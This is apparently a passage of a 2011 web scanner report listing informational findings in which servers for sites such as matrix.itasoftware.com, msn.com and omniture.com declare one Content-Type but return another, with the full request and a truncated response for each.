X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._rjf7ns && _xdc_._rjf7ns( [1] )

29.35. http://matrix.itasoftware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://matrix.itasoftware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:59:30 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"900-1299862248000"
Last-Modified: Fri, 11 Mar 2011 16:50:48 GMT
Content-Length: 900
Content-Type: text/plain; charset=UTF-8

GIF89aE.1.... S.X~........^.......t..f........Js.......<i....................................................!.......,....E.1.... $.diB.! ...Kp4.i.xn....@..0...7...l6    ...884.3Ce(.\.@qJ65.?.#.{...ry.N
...[SNIP]...

29.36. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://matrix.itasoftware.com
Path:   /geosearch/service/json/suggest/citiesAndAirports

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /geosearch/service/json/suggest/citiesAndAirports?name=Bismarck%2C%20ND%20(BIS)b&callback=dojo.io.script.jsonp_dojoIoScript10._jsonpCallback HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:20 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 54

dojo.io.script.jsonp_dojoIoScript10._jsonpCallback([])

29.37. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://myaccount.west.thomson.com
Path:   /MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
Referer: https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D; MA_ASP.NET_SessionId=3vutg44502ahok55j2zo3o45

Response

HTTP/1.1 200 OK
Content-Length: 376534
Content-Type: application/x-javascript
Content-Location: http://myaccount.west.thomson.com/MYACCOUNT/Scripts/globinfo/jQuery.glob.all.min.js
Last-Modified: Fri, 15 Apr 2011 15:05:48 GMT
Accept-Ranges: bytes
ETag: "06e199a7efbcb1:19bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:51 GMT

(function(d){var nL="zh-Hant",zlb="bosanski",nV="es-US",mV="es-PR",lV="es-NI",kV="es-HN",ylb="English (Singapore)",jV="en-SG",iV="es-SV",xlb="dddd, d MMMM, yyyy h:mm:ss tt",wlb="dddd, d MMMM, yyyy h:m
...[SNIP]...

29.38. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /visitor/v200/svrGP.aspx?pps=70&siteid=892&ref=http://www.omniture.com/en/products/conversion/testandtarget&ms=803 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:58:44 GMT
Content-Length: 86


function GetElqCustomerGUID(){ return '8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba'; }

29.39. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=2&profile.geo_continent_code=6&profile.geo_area_code=802&profile.tnt_customer=false&profile.customer_status=prospect&profile.language=en&mbox=omniTargetingInfo&mboxId=1&mboxTime=1303832132265&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 98
Date: Tue, 26 Apr 2011 20:58:55 GMT
Server: Test & Target

mboxFactories.get('default').get('omniTargetingInfo',1).setOffer(new mboxOfferDefault()).loaded();

29.40. http://pub2.widgetbox.com/css/fonts/LithoAntique-DemiBold-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pub2.widgetbox.com
Path:   /css/fonts/LithoAntique-DemiBold-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /css/fonts/LithoAntique-DemiBold-webfont.woff HTTP/1.1
Host: pub2.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.2.10.1303854385

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=604800
Content-Type: text/plain; charset=UTF-8
Date: Tue, 26 Apr 2011 21:46:17 GMT
ETag: "8700-4a14c6fcaf100+gzip"
Expires: Tue, 03 May 2011 21:46:17 GMT
Last-Modified: Tue, 19 Apr 2011 21:46:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (dca/53C6)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 34560

wOFF........................................FFTM............S...GDEF..p....(...,.0..GPOS..r|...e..4xx'..GSUB..p........`...XOS/2.......X...`...Tcmap...x...z......A.cvt .......F...F
..$fpgm...........e
...[SNIP]...

29.41. http://pub2.widgetbox.com/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pub2.widgetbox.com
Path:   /images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /images/favicon.ico HTTP/1.1
Host: pub2.widgetbox.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.4.10.1303854385; km_vs=1; km_lv=1303854392; km_uq=

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/plain; charset=UTF-8
Date: Tue, 26 Apr 2011 21:47:15 GMT
ETag: "576e-4a14c6fac6c80+gzip"
Expires: Tue, 03 May 2011 21:47:15 GMT
Last-Modified: Tue, 19 Apr 2011 21:46:10 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (dca/5331)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 22382

......@@.... .(B..6... .... .....^B........ .h....S..(...@......... ...................................................................................................................................
...[SNIP]...

29.42. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=MSNHQ2&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1042
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8479954-T22841720-C4000000000033190
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:29 GMT
Content-Length: 1042


//<![CDATA[
function getRADIds() { return{"adid":"4000000000033190","pid":"8479954","targetid":"22841720"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 100, 25);}
tr
...[SNIP]...

29.43. http://s7.addthis.com/js/addthis_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s7.addthis.com
Path:   /js/addthis_widget.php

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /js/addthis_widget.php?v=12 HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dab4fa85facd099; psc=3; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:34 GMT
ETag: "e023e9-a33c-4a143758e8d80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Tue, 26 Apr 2011 22:40:26 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 41788

/* (c) 2008, 2009, 2010 Add This, LLC */
var addthis_conf={ver:120};function addthis_to(a){return addthis_sendto(a)}function addthis_onmouseover(b,f,d,c,h,a,g){if(h){addthis_config.username=h}if(a){ad
...[SNIP]...

29.44. http://sales.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=18987408 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://advertising.microsoft.com/home?s_cid=us_msn_footer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303834849435

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=18987408
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:22d0"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:45:15 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

29.45. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; mbox=PC#1303601743323-887111.17#1306068395|session#1303649073183-321692#1303651055|check#true#1303649261; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 00:35:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www6.dmz
Content-Length: 485
Content-Type: application/javascript
Date: Tue, 26 Apr 2011 20:35:19 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=173.193.214.243',
'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region
...[SNIP]...

29.46. http://survey.112.2o7.net/survey/dynamic/suites/274/omniturecom/list.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://survey.112.2o7.net
Path:   /survey/dynamic/suites/274/omniturecom/list.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /survey/dynamic/suites/274/omniturecom/list.js?93212056061 HTTP/1.1
Host: survey.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]

Response

HTTP/1.1 200 OK
Server: Omniture DC/2.0.0
Last-Modified: Fri, 15 Apr 2011 06:00:12 GMT
ETag: "542aa-35-c1449300"
Accept-Ranges: bytes
Content-Length: 53
Cache-Control: max-age=7776000
Expires: Mon, 25 Jul 2011 16:57:44 GMT
xserver: www465
Content-Type: application/javascript
Date: Tue, 26 Apr 2011 20:59:03 GMT
Connection: close

s_sv_globals.onListLoaded('','','','omniturecom',[]);

29.47. http://video.od.visiblemeasures.com/log  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://video.od.visiblemeasures.com
Path:   /log

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /log?feature=B&key=en-us_7c3add9fb5336e1f8e00000000&randomId=1548745391&ts=1303825648421&user=EEBCC0E18CB766C4B61693A8DA056D476384FA08&objectId=1303825648424%3a0&ct=1303825648424 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 26 Apr 2011 18:47:37 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Thu, 24 Feb 2011 07:58:25 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1

29.48. http://view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.c3metrics.com
Path:   /v.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /v.js?id=drive&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/110247222/direct;;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:45:29 GMT
Last-Modified: Tue, 26 Apr 2011 18:40:38 GMT
Server: ECS (dca/533E)
X-Cache: HIT
Content-Length: 2413

/*
* C3 Metrics
* Copyright (c) C3 Metrics (www.c3metrics.com) All Right Reserved
*
* Last Updated: 2011-02-28 09:29:00
*/
var c3VJSurl="http://view.c3metrics.com/v.js";var c3VJSflurl="htt
...[SNIP]...

29.49. http://vms.msn.com/vms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vms.msn.com
Path:   /vms.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /vms.aspx?mediaid=11111111-1111-1111-1111-111111111111&publisher=MSN%20Video&player=sponsor&subplayer=MSVBSB HTTP/1.1
Host: vms.msn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; countrycode=US; zipcode=75207

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 428
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:47:41 GMT
Content-Length: 428

<?xml version="1.0" encoding="utf-8"?><AdManifest><AdManifestVersion version="1.0" /><ClientPolicy><Attribute Name="clickToContinue" Value="false" /><Attribute Name="replayPolicy" Value="unlock" /><At
...[SNIP]...

29.50. http://wd.sharethis.com/api/getApi.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess&service=initWidget HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:52:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

initWidgetOnSuccess({"status":"SUCCESS","data":{"session_token":"d1b7312256202cf8a161dc55717ba8b1","ga":true}});

29.51. http://widgetserver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://widgetserver.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:45:59 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Apr 2008 17:08:05 GMT
ETag: "47e-44a9bfa34e740"
Accept-Ranges: bytes
Content-Length: 1150
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .......................................................-$......................................................-H..-...-...........................................
...[SNIP]...

29.52. http://www.allpages.com/css/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allpages.com
Path:   /css/favicon.ico

